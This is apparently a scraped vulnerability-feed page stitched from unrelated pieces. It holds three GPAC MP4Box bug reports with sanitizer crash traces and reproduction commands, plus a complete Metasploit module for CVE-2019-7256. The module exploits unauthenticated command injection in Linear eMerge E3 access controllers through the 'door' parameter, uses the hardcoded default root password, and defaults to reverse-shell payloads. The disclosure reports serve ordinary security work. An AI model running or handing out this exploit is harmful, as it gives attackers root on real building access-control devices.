    [Core] exp-golomb read failed, not enough bits in bitstream !
    [HEVC] Error parsing NAL unit type 32
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [HEVC] Error parsing NAL unit type 33
    [HEVC] Error parsing NAL unit type 16
    Track Importing HEVC - Width -10 Height -20316159 FPS 25000/1000
    [HEVC] Error parsing NAL Unit 8 (size 0 type 0 frame 0 last POC 0) - skipping
    [HEVC] Error parsing NAL unit type 16
    [HEVC] Error parsing NAL unit type 0
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [HEVC] Error parsing NAL unit type 32
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [HEVC] Error parsing NAL unit type 33
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [HEVC] Error parsing NAL unit type 34
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [HEVC] Wrong number of layer sets in VPS 5
    [HEVC] Error parsing NAL unit type 32
    [HEVC] Error parsing Video Param Set
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [HEVC] Error parsing NAL unit type 32
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [HEVC] Error parsing NAL unit type 33
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [HEVC] Error parsing NAL unit type 34
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [HEVC] Error parsing NAL unit type 34
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [HEVC] sorry, 11 layers in VPS but only 4 supported
    [HEVC] Error parsing NAL unit type 32
    [HEVC] Error parsing Video Param Set
    media_tools/av_parsers.c:8261:45: runtime error: index 45 out of bounds for type 'u32 [16]'
    

**POC**

poc\_bof8.zip

**Impact**

Potentially causing DoS and RCE

**Credit**

Xdchase

CVE-2022-47654: buffer overflow in gf_hevc_read_sps_bs_internal function of media_tools/av_parsers.c:8261 · Issue #2350 · gpac/gpac

GPAC MP4Box 2.1-DEV-rev649-ga8f438d20 has a segment fault (/stack overflow) due to infinite recursion in Media_GetSample isomedia/media.c:662

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels,

**Description**

segment fault (/stack overflow) due to infinite recursion in Media\_GetSample isomedia/media.c:662

**Version info**

latest version atm

    MP4Box - GPAC version 2.1-DEV-rev649-ga8f438d20-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
    	GPAC Filters: https://doi.org/10.1145/3339825.3394929
    	GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D
    

**Reproduce**

compile and run

    ./configure --enable-sanitizer
    make
    ./MP4Box import -cat poc_segfault2.mp4
    

Crash reported by sanitizer

    [HEVC] Error parsing NAL unit type 63
    Track Importing L-HEVC - Width 1 Height 6 FPS 25000/1000
    [HEVC] NAL Unit type 26 not handled - adding
    [HEVC] xPS changed but could not flush frames before signaling state change !
    [HEVC] Error parsing NAL unit type 33
    [HEVC] Error parsing NAL unit type 32
    [HEVC] Invalid log2_max_pic_order_cnt_lsb_minus4 80, max shall be 12
    [HEVC] Error parsing NAL unit type 33
    [HEVC] Error parsing Sequence Param Set
    [HEVC] Error parsing NAL unit type 34
    [HEVC] Error parsing NAL unit type 0
    [HEVC] Error parsing NAL unit type 32         
    [HEVC] Error parsing NAL unit type 32
    HEVC Import results: 7 samples (39 NALUs) - Slices: 0 I 0 P 1 B - 0 SEI - 0 IDR - 0 CRA
    HEVC L-HEVC Import results: Slices: 3 I 0 P 2 B
    HEVC Stream uses forward prediction - stream CTS offset: 6 frames
    HEVC Max NALU size is 106 - stream could be optimized by setting nal_length=1
    Appending file /home/sumuchuan/Desktop/gpac_fuzz/cat_gpac/bin/gcc/out/default/crashes/160.mp4
    No suitable destination track found - creating new one (type vide)
    AddressSanitizer:DEADLYSIGNAL   | (57/100)
    =================================================================
    ==738673==ERROR: AddressSanitizer: stack-overflow on address 0x7ffdae782bc0 (pc 0x7f415d384491 bp 0x7ffdae783400 sp 0x7ffdae782bc0 T0)
        #0 0x7f415d384491 in __sanitizer::StackTrace::StackTrace(unsigned long const*, unsigned int) ../../../../src/libsanitizer/sanitizer_common/sanitizer_stacktrace.h:52
        #1 0x7f415d384491 in __sanitizer::BufferedStackTrace::BufferedStackTrace() ../../../../src/libsanitizer/sanitizer_common/sanitizer_stacktrace.h:105
        #2 0x7f415d384491 in __interceptor_free ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:127
        #3 0x7f415787f858 in __GI__IO_free_backup_area libio/genops.c:190
        #4 0x7f415787cae3 in _IO_new_file_seekoff libio/fileops.c:975
        #5 0x7f415787ad52 in __fseeko libio/fseeko.c:40
        #6 0x7f4159a1536a in BS_SeekIntern utils/bitstream.c:1338
        #7 0x7f4159a1536a in gf_bs_seek utils/bitstream.c:1373
        #8 0x7f4159fbbfc9 in gf_isom_fdm_get_data isomedia/data_map.c:501
        #9 0x7f4159fbbfc9 in gf_isom_datamap_get_data isomedia/data_map.c:279
        #10 0x7f415a0a1f40 in Media_GetSample isomedia/media.c:641
        #11 0x7f4159ffc579 in gf_isom_get_sample_ex isomedia/isom_read.c:1916
        #12 0x7f4159ec91ca in gf_isom_nalu_sample_rewrite isomedia/avc_ext.c:454
        #13 0x7f415a0a305a in Media_GetSample isomedia/media.c:662
        #14 0x7f4159ffc579 in gf_isom_get_sample_ex isomedia/isom_read.c:1916
        #15 0x7f4159ec91ca in gf_isom_nalu_sample_rewrite isomedia/avc_ext.c:454
        #16 0x7f415a0a305a in Media_GetSample isomedia/media.c:662
        #17 0x7f4159ffc579 in gf_isom_get_sample_ex isomedia/isom_read.c:1916
        #18 0x7f4159ec91ca in gf_isom_nalu_sample_rewrite isomedia/avc_ext.c:454
        #19 0x7f415a0a305a in Media_GetSample isomedia/media.c:662
        #20 0x7f4159ffc579 in gf_isom_get_sample_ex isomedia/isom_read.c:1916
        #21 0x7f4159ec91ca in gf_isom_nalu_sample_rewrite isomedia/avc_ext.c:454
        #22 0x7f415a0a305a in Media_GetSample isomedia/media.c:662
        #23 0x7f4159ffc579 in gf_isom_get_sample_ex isomedia/isom_read.c:1916
        #24 0x7f4159ec91ca in gf_isom_nalu_sample_rewrite isomedia/avc_ext.c:454
        ...
    

looks like an infinite recursion

    Media_GetSample isomedia/media.c:662
     -> gf_isom_nalu_sample_rewrite isomedia/avc_ext.c:454
     -> gf_isom_get_sample_ex isomedia/isom_read.c:1916
     -> Media_GetSample isomedia/media.c:662
    

if compile without ASAN and run the same poc

    ./configure --static-bin
    make
    ./MP4Box import -cat poc_segfault2.mp4
    

there will be a segment fault

    [HEVC] Error parsing NAL unit type 63
    Track Importing L-HEVC - Width 1 Height 6 FPS 25000/1000
    [HEVC] NAL Unit type 26 not handled - adding
    [HEVC] xPS changed but could not flush frames before signaling state change !
    [HEVC] Error parsing NAL unit type 33
    [HEVC] Error parsing NAL unit type 32
    [HEVC] Invalid log2_max_pic_order_cnt_lsb_minus4 80, max shall be 12
    [HEVC] Error parsing NAL unit type 33
    [HEVC] Error parsing Sequence Param Set
    [HEVC] Error parsing NAL unit type 34
    [HEVC] Error parsing NAL unit type 0
    [HEVC] Error parsing NAL unit type 32         
    [HEVC] Error parsing NAL unit type 32
    HEVC Import results: 7 samples (39 NALUs) - Slices: 0 I 0 P 1 B - 0 SEI - 0 IDR - 0 CRA
    HEVC L-HEVC Import results: Slices: 3 I 0 P 2 B
    HEVC Stream uses forward prediction - stream CTS offset: 6 frames
    HEVC Max NALU size is 106 - stream could be optimized by setting nal_length=1
    Appending file /home/sumuchuan/Desktop/gpac_fuzz/cat_gpac/bin/gcc/out/default/crashes/160.mp4
    No suitable destination track found - creating new one (type vide)
    Segmentation fault=====         | (57/100)
    

Because it ran out of stack space, making rsp and rbp point to an unmapped memory, causing seg fault. backtrace atm

    pwndbg> bt
    ...
    #16487 0x000000000054d599 in gf_isom_get_sample_ex ()
    #16488 0x0000000000521d6d in gf_isom_nalu_sample_rewrite ()
    #16489 0x0000000000570e13 in Media_GetSample ()
    #16490 0x000000000054d599 in gf_isom_get_sample_ex ()
    #16491 0x0000000000521d6d in gf_isom_nalu_sample_rewrite ()
    #16492 0x0000000000570e13 in Media_GetSample ()
    #16493 0x000000000054d599 in gf_isom_get_sample_ex ()
    #16494 0x0000000000521d6d in gf_isom_nalu_sample_rewrite ()
    #16495 0x0000000000570e13 in Media_GetSample ()
    ...
    

**POC**

poc-segfault2.zip

**Impact**

Potentially causing DoS

**Credit**

Xdchase

CVE-2022-47662: Infinite recursion in Media_GetSample isomedia/media.c:662 · Issue #2359 · gpac/gpac

This Metasploit module exploits a command injection vulnerability in the Linear eMerge E3-Series Access Controller. The Linear eMerge E3 versions 1.00-06 and below are vulnerable to unauthenticated command injection in card_scan_decoder.php via the No and door HTTP GET parameter. Successful exploitation results in command execution as the root user.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'rex/stopwatch'class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Linear eMerge E3-Series Access Controller Command Injection',        'Description' => %q{          This module exploits a command injection vulnerability in the Linear eMerge          E3-Series Access Controller. The Linear eMerge E3 versions `1.00-06` and below are vulnerable          to unauthenticated command injection in card_scan_decoder.php via the  `No` and `door` HTTP GET parameter.          Successful exploitation results in command execution as the `root` user.        },        'License' => MSF_LICENSE,        'Author' => [          'Gjoko Krstic <gjoko[at]applied-risk.com>', # Discovery          'h00die-gr3y <h00die.gr3y[at]gmail.com>' # MSF Module contributor        ],        'References' => [          [ 'CVE', '2019-7256'],          [ 'URL', 'https://applied-risk.com/resources/ar-2019-005' ],          [ 'URL', 'https://na.niceforyou.com/' ],          [ 'URL', 'https://attackerkb.com/topics/8WUJkci8N4/cve-2019-7256' ],          [ 'EDB', '47649'],          [ 'PACKETSTORM', '155256']        ],        'DisclosureDate' => '2019-10-29',        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_CMD, ARCH_ARMLE],        'Privileged' => true,        'Targets' => [          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_bash'              }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ARCH_ARMLE],              'Type' => :linux_dropper,              'CmdStagerFlavor' => [ 'wget', 'printf', 'echo' ],              'DefaultOptions' => {                'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'RPORT' => 80,          'SSL' => false        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options(      [        OptString.new('ROOT_PASSWORD', [ true, 'default root password on a vulnerable Linear eMerge E3-Series access controller', 'davestyle']),      ]    )  end  def execute_command(cmd, _opts = {})    random_no = rand(30..100)    return send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'card_scan_decoder.php'),      'vars_get' =>        {          'No' => random_no,          'door' => "`echo #{datastore['ROOT_PASSWORD']}|su -c \"#{cmd}\"`"        }    })  rescue StandardError => e    elog("#{peer} - Communication error occurred: #{e.message}", error: e)    fail_with(Failure::Unknown, "Communication error occurred: #{e.message}")  end  # Checking if the target is vulnerable by executing a randomized sleep to test the remote code execution  def check    print_status("Checking if #{peer} can be exploited.")    sleep_time = rand(2..10)    print_status("Performing command injection test issuing a sleep command of #{sleep_time} seconds.")    res, elapsed_time = Rex::Stopwatch.elapsed_time do      execute_command("sleep #{sleep_time}")    end    return CheckCode::Unknown('No response received from the target!') unless res    return CheckCode::Safe('Target is not affected by this vulnerability.') unless res.code == 200 && !res.body.blank? && res.body =~ /"card_format_default":"/    print_status("Elapsed time: #{elapsed_time.round(2)} seconds.")    return CheckCode::Safe('Command injection test failed.') unless elapsed_time >= sleep_time    CheckCode::Vulnerable('Successfully tested command injection.')  end  def exploit    case target['Type']    when :unix_cmd      print_status("Executing #{target.name} with #{payload.encoded}")      # Don't check the response here since the server won't respond      # if the payload is successfully executed.      execute_command(payload.encoded)    when :linux_dropper      print_status("Executing #{target.name}")      execute_cmdstager(linemax: 262144)    end  endend

Linear eMerge E3-Series Access Controller Command Injection

GPAC MP4box 2.1-DEV-rev574-g9d5bb184b is vulnerable to Buffer overflow in hevc_parse_vps_extension function of media_tools/av_parsers.c

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop\_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95

Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/

**Description**

Buffer overflow in hevc\_parse\_vps\_extension function of media\_tools/av\_parsers.c

for (i = 0; i < (num\_scalability\_types - splitting\_flag); i++) {
  dimension\_id\_len\[i\] = 1 + gf\_bs\_read\_int\_log\_idx(bs, 3, "dimension\_id\_len\_minus1", i); // overflow at dimension\_id\_len
}

**Version info**

    MP4Box - GPAC version 2.1-DEV-rev574-g9d5bb184b-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
    	GPAC Filters: https://doi.org/10.1145/3339825.3394929
    	GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D
    

**Reproduce**

compile and run

    ./configure --enable-sanitizer
    make
    ./MP4Box import -add poc_bof6.mp4
    

Crash reported by sanitizer

    [Core] exp-golomb read failed, not enough bits in bitstream !
    [HEVC] Warning: Error parsing NAL unit
    media_tools/av_parsers.c:7633:19: runtime error: index 16 out of bounds for type 'u8 [16]'
    

**POC**

poc\_bof6.zip

**Impact**

Potentially causing DoS and RCE

**Credit**

Xdchase

CVE-2022-47095: Buffer overflow in hevc_parse_vps_extension function of media_tools/av_parsers.c · Issue #2346 · gpac/gpac

GPAC MP4box 2.1-DEV-rev574-g9d5bb184b is vulnerable to Buffer Overflow in gf_text_process_sub function of filters/load_text.c

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop\_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95

Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/

**Description**

Buffer overflow in gf\_text\_process\_sub function of filters/load\_text.c

while (szLine\[i+1+j\] && szLine\[i+1+j\]!='}') {
	szTime\[i\] = szLine\[i+1+j\]; // overflow at szTime
	i++;
}

**Version info**

    MP4Box - GPAC version 2.1-DEV-rev574-g9d5bb184b-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
    	GPAC Filters: https://doi.org/10.1145/3339825.3394929
    	GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D
    

**Reproduce**

compile and run

    ./configure --enable-sanitizer
    make
    ./MP4Box import -add poc_bof5.avi
    

Crash reported by sanitizer

    Track Importing Timed Text - Text track 400 x 60 font Serif (size 18) layer 0
    [TXTIn] Bad SUB file - expecting "{" got "{"
    [TXTIn] corrupted SUB frame (line 2) - ends (at 0 ms) before start of current frame (6 ms) - skipping
    filters/load_text.c:2569:10: runtime error: index 20 out of bounds for type 'char [20]'
    

**POC**

poc\_bof5.zip

**Impact**

Potentially causing DoS and RCE

**Credit**

Xdchase

Tag

#ssl